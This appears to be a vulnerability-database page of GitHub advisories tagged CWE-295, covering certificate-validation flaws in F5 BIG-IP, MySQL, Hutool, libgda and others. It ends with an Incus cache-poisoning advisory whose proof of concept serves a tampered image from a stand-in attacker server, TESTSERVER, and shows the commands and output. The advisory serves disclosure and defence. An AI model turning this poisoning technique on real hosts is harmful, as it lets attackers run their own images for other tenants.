CWE-295
AllowedImproper Certificate Validation
Abstraction: Base · Status: Draft
The product does not validate, or incorrectly validates, a certificate.
1908 vulnerabilities reference this CWE, most recent first.
GHSA-P7PQ-M3XX-W733
Vulnerability from github – Published: 2022-05-14 03:22 – Updated: 2022-05-14 03:22X509 certificate verification was not correctly implemented in the IP Intelligence Subscription and IP Intelligence feed-list features, and thus the remote server's identity is not properly validated in F5 BIG-IP 12.0.0-12.1.2, 11.6.0-11.6.2, or 11.5.0-11.5.5.
{
"affected": [],
"aliases": [
"CVE-2017-6143"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-13T13:29:00Z",
"severity": "MODERATE"
},
"details": "X509 certificate verification was not correctly implemented in the IP Intelligence Subscription and IP Intelligence feed-list features, and thus the remote server\u0027s identity is not properly validated in F5 BIG-IP 12.0.0-12.1.2, 11.6.0-11.6.2, or 11.5.0-11.5.5.",
"id": "GHSA-p7pq-m3xx-w733",
"modified": "2022-05-14T03:22:27Z",
"published": "2022-05-14T03:22:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6143"
},
{
"type": "WEB",
"url": "https://support.f5.com/csp/article/K11464209"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-P7QF-9C5Q-FW2W
Vulnerability from github – Published: 2025-04-08 09:31 – Updated: 2025-04-08 09:31A vulnerability has been identified in Siemens License Server (SLS) (All versions < V4.3). The affected application does not properly restrict permissions of the users. This could allow a lowly-privileged attacker to escalate their privileges.
{
"affected": [],
"aliases": [
"CVE-2025-30000"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-08T09:15:27Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been identified in Siemens License Server (SLS) (All versions \u003c V4.3). The affected application does not properly restrict permissions of the users. This could allow a lowly-privileged attacker to escalate their privileges.",
"id": "GHSA-p7qf-9c5q-fw2w",
"modified": "2025-04-08T09:31:13Z",
"published": "2025-04-08T09:31:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30000"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-525431.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-P7QR-V5JX-7QV3
Vulnerability from github – Published: 2022-05-14 02:48 – Updated: 2025-04-12 13:00Oracle MySQL before 5.7.3, Oracle MySQL Connector/C (aka libmysqlclient) before 6.1.3, and MariaDB before 5.5.44 use the --ssl option to mean that SSL is optional, which allows man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, aka a "BACKRONYM" attack.
{
"affected": [],
"aliases": [
"CVE-2015-3152"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-05-16T10:59:00Z",
"severity": "MODERATE"
},
"details": "Oracle MySQL before 5.7.3, Oracle MySQL Connector/C (aka libmysqlclient) before 6.1.3, and MariaDB before 5.5.44 use the --ssl option to mean that SSL is optional, which allows man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, aka a \"BACKRONYM\" attack.",
"id": "GHSA-p7qr-v5jx-7qv3",
"modified": "2025-04-12T13:00:03Z",
"published": "2022-05-14T02:48:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3152"
},
{
"type": "WEB",
"url": "https://github.com/mysql/mysql-server/commit/3bd5589e1a5a93f9c224badf983cd65c45215390"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/cve-2015-3152"
},
{
"type": "WEB",
"url": "https://jira.mariadb.org/browse/MDEV-7937"
},
{
"type": "WEB",
"url": "https://www.duosecurity.com/blog/backronym-mysql-vulnerability"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-July/161436.html"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-July/161625.html"
},
{
"type": "WEB",
"url": "http://mysqlblog.fivefarmers.com/2014/04/02/redefining-ssl-option"
},
{
"type": "WEB",
"url": "http://mysqlblog.fivefarmers.com/2015/04/29/ssltls-in-5-6-and-5-5-ocert-advisory"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/131688/MySQL-SSL-TLS-Downgrade.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2015-1646.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2015-1647.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2015-1665.html"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2015/dsa-3311"
},
{
"type": "WEB",
"url": "http://www.ocert.org/advisories/ocert-2015-003.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/535397/100/1100/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/74398"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1032216"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-P7W9-8MXW-P3G7
Vulnerability from github – Published: 2022-02-17 00:00 – Updated: 2022-03-01 18:36Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "cn.hutool:hutool-http"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.7.19"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-22885"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": true,
"github_reviewed_at": "2022-02-17T23:30:58Z",
"nvd_published_at": "2022-02-16T22:15:00Z",
"severity": "CRITICAL"
},
"details": "Hutool v5.7.18\u0027s HttpRequest was discovered to ignore all TLS/SSL certificate validation.",
"id": "GHSA-p7w9-8mxw-p3g7",
"modified": "2022-03-01T18:36:44Z",
"published": "2022-02-17T00:00:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22885"
},
{
"type": "WEB",
"url": "https://github.com/dromara/hutool/issues/2042"
},
{
"type": "WEB",
"url": "https://apidoc.gitee.com/dromara/hutool/cn/hutool/http/ssl/DefaultSSLInfo.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/dromara/hutool"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Certificate Validation in Hutool"
}
GHSA-P8HP-P5RW-J34R
Vulnerability from github – Published: 2022-05-24 19:11 – Updated: 2022-05-24 19:11In GNOME libgda through 6.0.0, gda-web-provider.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.
{
"affected": [],
"aliases": [
"CVE-2021-39359"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-22T19:15:00Z",
"severity": "MODERATE"
},
"details": "In GNOME libgda through 6.0.0, gda-web-provider.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.",
"id": "GHSA-p8hp-p5rw-j34r",
"modified": "2022-05-24T19:11:52Z",
"published": "2022-05-24T19:11:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39359"
},
{
"type": "WEB",
"url": "https://github.com/GNOME/libgda/commit/bd7b9568bcd9f6d3e6680bb04323a670c842a62d"
},
{
"type": "WEB",
"url": "https://blogs.gnome.org/mcatanzaro/2021/05/25/reminder-soupsessionsync-and-soupsessionasync-default-to-no-tls-certificate-verification"
},
{
"type": "WEB",
"url": "https://gitlab.gnome.org/GNOME/libgda/-/issues/249"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HRPPP47WRCAPAEJGRMEKYYJZBQCYXTLQ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WLMVVIJNY5NMOT3FH36RFBWOTPVW7GME"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HRPPP47WRCAPAEJGRMEKYYJZBQCYXTLQ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLMVVIJNY5NMOT3FH36RFBWOTPVW7GME"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-P8MM-23GG-JC9R
Vulnerability from github – Published: 2026-03-27 17:08 – Updated: 2026-03-27 17:08Summary
A lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one.
Details
Incus image fingerprints are computed as the SHA256 of the concatenated image files. When downloading from a public image server using a simplestreams index, Incus requires an HTTPS connection and validates the SHA256 of the individual files but is lacking validation that the concatenated hash of the files matches the fingerprint listed in the simplestreams index.
This missing check allows an attacker with access to an Incus environment lacking suitable image source restrictions (restricted.image.server or equivalent firewall rules) to cause Incus to download from an attacker controlled image server which would provide different image files for an other well known image fingerprint.
Such an attack can be used to poison the global image cache, leading to another user on the system wanting to use the legitimate image to be provided the compromised one instead.
For this to be successful, the attacker requires:
- Access to an Incus server
- That server to NOT have been configured with
restricted.image.serversor an equivalent firewall or HTTP proxy policy - Some ability to predict what image may be used by other users in the near future
- Other users that are actively deploying new Incus instances on the system
Having to predict what image may be used in the future which doesn't have its legitimate copy already cached on the system (or somewhere within the cluster) makes this attack quite difficult to pull off. It's made even harder by not having any control as to when a given image may be used by another user.
An example of a somewhat easy target would be a server that's known to run ephemeral instances for Ci or build purposes, as those will get created very frequently and the images they use may be public knowledge, it would be possible to get a compromised image in place with the right timing:
- Monitor the legitimate image server for a new image being published
- Immediately create a compromised image with the same fingerprint on an attacker controlled image server
- Get the target Incus environment to download that image BEFORE any legitimate instance creation had the time to pull the legitimate image
But this again assumes an environment lacking either restricted.image.servers or equivalent firewall or proxy policies.
Mitigation
As mentioned above, any server using restricted.image.servers in project configuration, as would be strongly recommended in multi-tenant environments will be immune to this attack. As would any server going through equivalent network restriction whether implemented through firewalling or through an HTTP proxy server.
The updated Incus versions will now validate not just the individual files during download but also that the hash of the concatenated files does match the image fingerprint, fully preventing such an attack in the future.
PoC
To create a PoC, simply download https://images.linuxcontainers.org/streams/v1/{index,images}.json and https://images.linuxcontainers.org/images/DISTRO/RELEASE/ARCH/default/NEWEST/{incus.tar.xz,rootfs.squashfs} or similar paths, put them in suitable locations in a folder, and then use a server to serve them through https. The TLS certificate used by the server may need to be signed by a trusted CA of the client system.
Then change the content of rootfs.squashfs by unsquashfs/mksquashfs, add one line in /root/.bashrc: echo 'PoC: hacked!', and then update corresponding sha256 and size fields for that individual file in images.json.
Using incus-simplestreams first and then altering the combined_xxx fields should also be OK.
After that, check the following commands:
$ incus remote add poc https://TESTSERVER:4443 --protocol simplestreams
$ incus remote list
+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+
| NAME | URL | PROTOCOL | AUTH TYPE | PUBLIC | STATIC | GLOBAL |
+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+
| images | https://images.linuxcontainers.org | simplestreams | none | YES | NO | NO |
+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+
| local (current) | unix:// | incus | file access | NO | YES | NO |
+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+
| poc | https://TESTSERVER:4443 | simplestreams | none | YES | NO | NO |
+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+
$ incus image list
+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
$ incus image list images:debian/trixie -c lFpdasu
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13 (7 more) | 8dad70759d54410e4e8ad84164f6a9d8bda3af753a54441365ff1476f065999c | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 341.13MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13 (7 more) | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 94.70MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/arm64 (3 more) | 41b4f8849cfc8d22a6b9cd86790602a43f67a9ec2c1d7e13a0b3ecf7b7d6663e | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 339.27MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/arm64 (3 more) | fda543def4b41f65511696ec0350d899dad5374956d18078697f58d1c466bae4 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 92.25MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/armhf (3 more) | 77ef0a077759eab7690b1401bfbec78360d2a0462ee89fa3de86b899465adedb | yes | Debian trixie armhf (20260320_05:24) | armv7l | 84.14MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/cloud (3 more) | 2ee3da00ca407ea98e1b84a2d5b1561c0fffb0281b05035e307e5029cdaa5532 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 130.17MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/cloud (3 more) | 108ed9a36105c37ba5412a880b5c39653536453189789aa101e46591de620d56 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 374.30MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/cloud/arm64 (1 more) | cfb51c473e221b6c8b62a21808bd4f69ca4845108abfb14187fde8b79befbab3 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 126.78MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/cloud/arm64 (1 more) | ff2c2c62849d978dfad0cc1df54c0f55881a0edf3b31333c3b2a00413eaee1a5 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 371.76MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/cloud/armhf (1 more) | 8eb505d548265e371a3ab0d277f76986f0879e414a6a74af2f975cf3caffc565 | yes | Debian trixie armhf (20260320_05:24) | armv7l | 117.92MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/cloud/riscv64 (1 more) | dab5009031d0d03c8cfebb330a83baf950eb79b8277a5f071e0a81758d17b8b4 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 122.90MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
| debian/13/riscv64 (3 more) | 1fa5c6eaf7f3c107b96625b49bc2e4f00b077d949d349d9e3c412747ec492341 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 87.86MiB | 2026/03/20 08:00 CST |
+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+
$ incus image copy poc:debian/trixie local:
Image copied successfully!
$ incus image list -c lFpdasu
+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |
+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+
| | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | no | Debian trixie amd64 (20260320_05:24) | x86_64 | 105.09MiB | 2026/03/21 00:55 CST |
+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+
$ incus launch images:debian/trixie
Launching the instance
Instance name is: star-mollusk
$ incus list
+--------------+---------+------+------------------------------------------------+-----------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+--------------+---------+------+------------------------------------------------+-----------+-----------+
| star-mollusk | RUNNING | | fd42:115a:7a71:9748:1266:6aff:fe1a:d504 (eth0) | CONTAINER | 0 |
+--------------+---------+------+------------------------------------------------+-----------+-----------+
$ incus exec star-mollusk bash
PoC: hacked!
root@star-mollusk:~#
exit
$ incus image export images:debian/trixie
Image exported successfully!
$ cat incus.tar.xz rootfs.squashfs | sha256sum
945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 -
$ rm incus.tar.xz rootfs.squashfs
$ incus image export poc:debian/trixie
Image exported successfully!
$ cat incus.tar.xz rootfs.squashfs | sha256sum
d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -
$ rm incus.tar.xz rootfs.squashfs
$ incus image export local:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369
Error: Image fingerprint doesn't match. Got d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 expected 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369
$ incus image export poc:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369
Image exported successfully!
$ cat incus.tar.xz rootfs.squashfs | sha256sum
d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lxc/incus/v6/client"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.23.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33542"
],
"database_specific": {
"cwe_ids": [
"CWE-295",
"CWE-354"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T17:08:07Z",
"nvd_published_at": "2026-03-26T23:16:20Z",
"severity": "HIGH"
},
"details": "### Summary\nA lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one.\n\n### Details\nIncus image fingerprints are computed as the SHA256 of the concatenated image files.\nWhen downloading from a public image server using a simplestreams index, Incus requires an HTTPS connection and validates the SHA256 of the individual files but is lacking validation that the concatenated hash of the files matches the fingerprint listed in the simplestreams index.\n\nThis missing check allows an attacker with access to an Incus environment lacking suitable image source restrictions (`restricted.image.server` or equivalent firewall rules) to cause Incus to download from an attacker controlled image server which would provide different image files for an other well known image fingerprint.\n\nSuch an attack can be used to poison the global image cache, leading to another user on the system wanting to use the legitimate image to be provided the compromised one instead.\n\nFor this to be successful, the attacker requires:\n\n - Access to an Incus server\n - That server to NOT have been configured with `restricted.image.servers` or an equivalent firewall or HTTP proxy policy\n - Some ability to predict what image may be used by other users in the near future\n - Other users that are actively deploying new Incus instances on the system\n\nHaving to predict what image may be used in the future which doesn\u0027t have its legitimate copy already cached on the system (or somewhere within the cluster) makes this attack quite difficult to pull off. It\u0027s made even harder by not having any control as to when a given image may be used by another user.\n\nAn example of a somewhat easy target would be a server that\u0027s known to run ephemeral instances for Ci or build purposes, as those will get created very frequently and the images they use may be public knowledge, it would be possible to get a compromised image in place with the right timing:\n\n - Monitor the legitimate image server for a new image being published\n - Immediately create a compromised image with the same fingerprint on an attacker controlled image server\n - Get the target Incus environment to download that image BEFORE any legitimate instance creation had the time to pull the legitimate image\n\nBut this again assumes an environment lacking either `restricted.image.servers` or equivalent firewall or proxy policies.\n\n### Mitigation\nAs mentioned above, any server using `restricted.image.servers` in project configuration, as would be strongly recommended in multi-tenant environments will be immune to this attack. As would any server going through equivalent network restriction whether implemented through firewalling or through an HTTP proxy server.\n\nThe updated Incus versions will now validate not just the individual files during download but also that the hash of the concatenated files does match the image fingerprint, fully preventing such an attack in the future.\n\n### PoC\nTo create a PoC, simply download `https://images.linuxcontainers.org/streams/v1/{index,images}.json` and `https://images.linuxcontainers.org/images/DISTRO/RELEASE/ARCH/default/NEWEST/{incus.tar.xz,rootfs.squashfs}` or similar paths, put them in suitable locations in a folder, and then use a server to serve them through https. The TLS certificate used by the server may need to be signed by a trusted CA of the client system.\n\nThen change the content of `rootfs.squashfs` by `unsquashfs`/`mksquashfs`, add one line in `/root/.bashrc`: `echo \u0027PoC: hacked!\u0027`, and then update corresponding `sha256` and `size` fields for that individual file in `images.json`.\n\nUsing `incus-simplestreams` first and then altering the `combined_xxx` fields should also be OK.\n\nAfter that, check the following commands:\n\n```\n$ incus remote add poc https://TESTSERVER:4443 --protocol simplestreams\n$ incus remote list \n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| NAME | URL | PROTOCOL | AUTH TYPE | PUBLIC | STATIC | GLOBAL |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| images | https://images.linuxcontainers.org | simplestreams | none | YES | NO | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| local (current) | unix:// | incus | file access | NO | YES | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| poc | https://TESTSERVER:4443 | simplestreams | none | YES | NO | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n$ incus image list \n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |\n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n$ incus image list images:debian/trixie -c lFpdasu\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more) | 8dad70759d54410e4e8ad84164f6a9d8bda3af753a54441365ff1476f065999c | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 341.13MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more) | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 94.70MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more) | 41b4f8849cfc8d22a6b9cd86790602a43f67a9ec2c1d7e13a0b3ecf7b7d6663e | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 339.27MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more) | fda543def4b41f65511696ec0350d899dad5374956d18078697f58d1c466bae4 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 92.25MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/armhf (3 more) | 77ef0a077759eab7690b1401bfbec78360d2a0462ee89fa3de86b899465adedb | yes | Debian trixie armhf (20260320_05:24) | armv7l | 84.14MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more) | 2ee3da00ca407ea98e1b84a2d5b1561c0fffb0281b05035e307e5029cdaa5532 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 130.17MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more) | 108ed9a36105c37ba5412a880b5c39653536453189789aa101e46591de620d56 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 374.30MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more) | cfb51c473e221b6c8b62a21808bd4f69ca4845108abfb14187fde8b79befbab3 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 126.78MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more) | ff2c2c62849d978dfad0cc1df54c0f55881a0edf3b31333c3b2a00413eaee1a5 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 371.76MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/armhf (1 more) | 8eb505d548265e371a3ab0d277f76986f0879e414a6a74af2f975cf3caffc565 | yes | Debian trixie armhf (20260320_05:24) | armv7l | 117.92MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/riscv64 (1 more) | dab5009031d0d03c8cfebb330a83baf950eb79b8277a5f071e0a81758d17b8b4 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 122.90MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/riscv64 (3 more) | 1fa5c6eaf7f3c107b96625b49bc2e4f00b077d949d349d9e3c412747ec492341 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 87.86MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n$ incus image copy poc:debian/trixie local:\nImage copied successfully! \n$ incus image list -c lFpdasu\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | no | Debian trixie amd64 (20260320_05:24) | x86_64 | 105.09MiB | 2026/03/21 00:55 CST |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n$ incus launch images:debian/trixie\nLaunching the instance\nInstance name is: star-mollusk \n$ incus list \n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| star-mollusk | RUNNING | | fd42:115a:7a71:9748:1266:6aff:fe1a:d504 (eth0) | CONTAINER | 0 |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n$ incus exec star-mollusk bash\nPoC: hacked!\nroot@star-mollusk:~# \nexit\n$ incus image export images:debian/trixie\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\n945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export poc:debian/trixie\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export local:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nError: Image fingerprint doesn\u0027t match. Got d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 expected 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\n$ incus image export 